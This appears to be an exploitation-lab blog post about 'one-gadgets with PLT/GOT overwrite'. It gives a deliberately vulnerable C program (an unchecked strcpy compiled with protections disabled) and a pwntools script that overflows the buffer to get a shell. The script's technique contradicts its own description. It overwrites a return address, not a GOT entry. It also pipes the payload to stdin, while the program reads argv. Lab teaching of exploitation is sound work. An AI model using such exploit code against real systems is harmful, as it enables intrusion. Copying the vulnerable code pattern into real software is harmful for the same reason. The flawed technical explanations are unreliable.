strangerRidingCaml
One-Gadgets with PLT/GOT Overwrite Lab 본문
728x90
One-Gadgets with PLT/GOT Overwrite Lab
In this lab, we will leverage one-gadgets to exploit binary vulnerabilities.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a buffer overflow vulnerability.
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input);
}
int main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program executed successfully.\n");
return 0;
}
Save the above code to a file named vulnerable.c
and compile it with the following command:
$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to leverage one-gadgets with PLT/GOT overwrite.
from pwn import *
# Specify the path to the vulnerable binary
binary_path = './vulnerable'
# Address of one-gadget
one_gadget_addr = 0xdeadbeef # Example address (change as needed)
# Offset to return address
offset = 72
# Craft the payload
payload = b'A' * offset
payload += p64(one_gadget_addr) # Overwrite GOT entry with one-gadget address
# Launch the exploit
p = process(binary_path)
p.sendline(payload)
p.interactive()
Explanation of the Python script:
- We specify the path to the vulnerable binary and the address of the one-gadget.
- The payload consists of padding, followed by the address of the one-gadget to overwrite the GOT entry.
- We launch the
vulnerable
binary and send the payload to exploit the binary vulnerability using one-gadgets with PLT/GOT overwrite. p.interactive()
allows us to interact with the spawned shell.
3. Exploiting the Vulnerability:
Execute the Python script to exploit the buffer overflow vulnerability:
$ python exploit.py
Once executed, you should have a shell prompt, confirming the successful exploitation of the binary vulnerability using one-gadgets with PLT/GOT overwrite.
'System hacking' 카테고리의 다른 글
Heap Feng Shui Exploitation Lab (0) | 2024.05.08 |
---|---|
Heap Spray Techniques Lab (0) | 2024.05.08 |
Race Condition Exploits Lab (0) | 2024.05.08 |
Blind Return-Oriented Programming (BROP) Lab (0) | 2024.05.08 |
Sigreturn-Oriented Programming (SROP) Lab (0) | 2024.05.08 |